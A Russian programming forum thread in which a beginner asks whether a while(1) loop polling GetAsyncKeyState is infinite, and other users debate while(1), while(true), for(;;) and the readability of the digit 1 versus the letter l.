Форум программистов, компьютерный форум CyberForum.ru
Наши страницы

С++ для начинающих

Войти
Регистрация
Восстановить пароль
 
 
Рейтинг: Рейтинг темы: голосов - 26, средняя оценка - 4.73
Капитан Техно
0 / 0 / 0
Регистрация: 18.07.2011
Сообщений: 32
#1

Вечный цикл - C++

18.07.2011, 11:07. Просмотров 3463. Ответов 27
Метки нет (Все метки)

является ли этот цикл зацикленным(вечным)?
C++
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
while(1){  
     
        for(i=8;i<=190;i++){
        
        if (GetAsyncKeyState(i) == -32767)
         
        {
        
           
          keys (i,test);
           
           
     
        }
    }
0
Similar
Эксперт
41792 / 34177 / 6122
Регистрация: 12.04.2006
Сообщений: 57,940
18.07.2011, 11:07
Здравствуйте! Я подобрал для вас темы с ответами на вопрос Вечный цикл (C++):

Непонятно почему вечный цикл - C++
Собственно дело вот в чём, если в мейне ввести не цифру, а букву (cin&gt;&gt;k), то цикл резко ломается к чертям, просто вечно выводит сообщения,...

НУжно найти ошибку из-за, которой крэшится программа. Похоже на вечный цикл - C++
По тестам выходит, что фейл находится в функции final, но не могу понять где, вроде уходит в вечный цикл и не может найти нуль-символ в...

Вечный календарь - C++
Написал программу &quot;Вечный календарь&quot;, которая определяет день недели введенной даты и подсчитует количество дней от введеной даты до...

Вечный календарь - C++
Привет, человеки. Я тут решаю задачу, которая проверяется автоматической системой. Вот задача: Вот мое решение ...

Вечный календарь - C++
помогите сделать програму Вечный календарь,которая при введении любой даты может определить день недели или сообщить о несуществующей дате.

Вечный календарь ошибка компиляции - C++
Здравствуйте!Написал программу при компиляции выдается ошибка.не могу разобраться где именно.подскажите пожалуйста. #include &lt;iostream&gt; ...

Надоела реклама? Зарегистрируйтесь и она исчезнет полностью.
ForEveR
В астрале
Эксперт С++
7972 / 4734 / 321
Регистрация: 24.06.2010
Сообщений: 10,542
Завершенные тесты: 3
18.07.2011, 11:10 #2
Капитан Техно, Да) while(1) априори зацикленный. А вот выход зависит от того что делает функция keys и что вернет GetAsyncKeyState().
1
Капитан Техно
0 / 0 / 0
Регистрация: 18.07.2011
Сообщений: 32
18.07.2011, 11:10  [ТС] #3
спасибо) очень приятные люди сидят на форуме, с меня +
0
co6ak
18.07.2011, 11:11
  #4

Не по теме:

не в тему конечно, но тем не менее. почему в тегах [цпп] допустим, 1 похоже на l ?

0
Капитан Техно
0 / 0 / 0
Регистрация: 18.07.2011
Сообщений: 32
18.07.2011, 11:18  [ТС] #5
у меня в редакторе тоже 1 похожа на l
0
co6ak
Кошковед
407 / 500 / 29
Регистрация: 12.04.2010
Сообщений: 1,392
18.07.2011, 11:22 #6
вот именно по этому всегда делаю вечный цикл только как while(true)
1
taras atavin
Ушёл с форума.
3569 / 1753 / 91
Регистрация: 24.11.2009
Сообщений: 27,619
18.07.2011, 11:29 #7
Цитата Сообщение от co6ak Посмотреть сообщение
всегда делаю вечный цикл только как while(true
Я тоже, но трудностей с прочтением однёрки не испытываю. На l она не похожа, но:
1. Когда при наборе имеешь ввиду true, то быстрее набрать именно true, чем вспоминать, что на этом языке true это всё, что не ноль, а потом этот не ноль ещё и выбирать. 1 true? Эйси. 10 тоже true.
2. При чтении быстрее будет прочитать true, чем вспоминать, что на этом языке true это всё, что не ноль, а потом ещё сравнивать.
Оптимизация работы мозга - тоже оптимизация, а заключается в том числе в выборе удобных идентификаторов.
1
silent_1991
Эксперт С++
4964 / 3040 / 149
Регистрация: 11.11.2009
Сообщений: 7,027
Завершенные тесты: 1
18.07.2011, 13:32 #8
Цитата Сообщение от taras atavin Посмотреть сообщение
Оптимизация работы мозга - тоже оптимизация
Слышали про устойчивые выражения? Так вот, в ЯП они тоже существуют. В С/С++ while (1) - как раз такое выражение. Прелесть устойчивых выражений в том, что не надо напрягать мозг для того, чтобы их осмыслить.
Я тоже использую while (true), когда пишу на С++. Однако в чистом С никаких булевых типов не было, там и выбора не было и приходилось писать while (1). И никого это не смущало.
1
fasked
Эксперт С++
4937 / 2517 / 180
Регистрация: 07.10.2009
Сообщений: 4,311
Записей в блоге: 1
18.07.2011, 13:37 #9
Именно поэтому не рекомендуется использовать букву 'l' в качестве имени переменной, а не наоборот, то есть не использовать 1 (единицу) в качестве числа, согласитесь это было бы глупо.
Например,
C++
1
2
for (i = l; i < n; ++i) {
}
C++
1
2
for (i = 1; i < n; ++i) {
}
Первый пример плохой, во втором ничего плохого нет (по другому никак и не сделаешь).

Не по теме:

А вообще в редакторах обычно числа и имена переменных подсвечиваются разным цветом.

1
easybudda
Модератор
Эксперт CЭксперт С++
9632 / 5580 / 948
Регистрация: 25.07.2009
Сообщений: 10,714
18.07.2011, 14:04 #10
Цитата Сообщение от Капитан Техно Посмотреть сообщение
у меня в редакторе тоже 1 похожа на l
пишите
C
1
2
3
for (;;){
/*...*/
}
не ошибётесь!
0
taras atavin
Ушёл с форума.
3569 / 1753 / 91
Регистрация: 24.11.2009
Сообщений: 27,619
19.07.2011, 06:11 #11
Цитата Сообщение от silent_1991 Посмотреть сообщение
Однако в чистом С никаких булевых типов не было
А препроцесор?
C
1
2
#define false 0
#define true 1
. Всё. И пиши себе как на плюсах.

Добавлено через 3 минуты
Цитата Сообщение от fasked Посмотреть сообщение
Первый пример плохой, во втором ничего плохого нет (по другому никак и не сделаешь).
Ну лови наглядное пособие, как делать не надо:
C++
1
2
3
4
5
6
int l=0;
++l;
for (i=l; i<n; ++i)
{
 ...
}
. Будешь оспаривать, что я по другому сделал?
0
silent_1991
19.07.2011, 10:04
  #12

Не по теме:

Цитата Сообщение от taras atavin Посмотреть сообщение
Будешь оспаривать, что я по другому сделал?
Ага, вы ещё класс One для этой цели напишите...

0
ValeryLaptev
Эксперт С++
1041 / 820 / 48
Регистрация: 30.04.2011
Сообщений: 1,659
19.07.2011, 10:09 #13
тогда лучше писать while(-1)...
0
silent_1991
Эксперт С++
4964 / 3040 / 149
Регистрация: 11.11.2009
Сообщений: 7,027
Завершенные тесты: 1
19.07.2011, 10:12 #14
ValeryLaptev, думаю, правильнее всего в таком случае
C++
1
2
while (!0)
    ...
Добавлено через 38 секунд

Не по теме:

Про 0 уже не скажешь, что она на O похожа

1
fasked
Эксперт С++
4937 / 2517 / 180
Регистрация: 07.10.2009
Сообщений: 4,311
Записей в блоге: 1
19.07.2011, 10:52 #15
Цитата Сообщение от taras atavin Посмотреть сообщение
Будешь оспаривать, что я по другому сделал?
Суть моего сообщения была в том, что плохо использовать l в качестве имени переменной, а не в чем-то другом. А Вы вообще непонятно что хотели доказать этим, Вам лишь бы поспорить.
1
MoreAnswers
Эксперт
37091 / 29110 / 5898
Регистрация: 17.06.2006
Сообщений: 43,301
19.07.2011, 10:52
Привет! Вот еще темы с ответами:

Вечный календарь: неразбериха с проверкой введения даты - C++
Ребята, вот кусок моего кода. Работает, но есть проблема с февралём до 12 года - вводишь 30 или 31 день, и программа думает, что так и...

Цикл: цикл for вообще никак не воспринимается транслятором - C++
Пишу программу, которая производит различные действия с одномерным массивом. Возникла следующая проблема: цикл for вообще никак не...

Почему цикл на при 1 уходит в бесконечный цикл? - C++
#define _CRT_SECURE_NO_WARNINGS #include &lt;iostream&gt; #include &lt;stdio.h&gt; #include &lt;string.h&gt; int main() { int x=0, y=0,...

Задание на цикл с параметром и цикл с постусловием - C++
Помогите пожалуйста написать программу с этими циклами. 1. Вычислить и напечатать таблицу значений функции Z= (e^-x)sinx для 0&lt;=x&lt;=П,...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
Yandex
Объявления
19.07.2011, 10:52
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2017, vBulletin Solutions, Inc.
Рейтинг@Mail.ru